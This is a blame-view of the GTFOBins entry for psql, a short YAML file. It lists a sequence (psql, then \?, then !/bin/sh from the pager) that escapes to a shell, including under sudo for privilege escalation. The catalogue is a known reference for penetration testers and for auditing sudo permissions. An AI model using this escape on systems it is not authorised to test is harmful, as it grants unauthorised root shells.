GTFOBins.github.io/_gtfobins/psql.md

15 lines
267 B
Markdown
Raw Permalink Normal View History

2020-11-12 13:21:00 +00:00
---
2020-12-20 19:13:01 +00:00
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
2020-11-12 13:21:00 +00:00
functions:
shell:
- code: |
psql
\?
2020-12-20 19:13:01 +00:00
!/bin/sh
sudo:
2020-11-12 13:21:00 +00:00
- code: |
psql
\?
2020-12-20 19:13:01 +00:00
!/bin/sh
2020-11-12 13:21:00 +00:00
---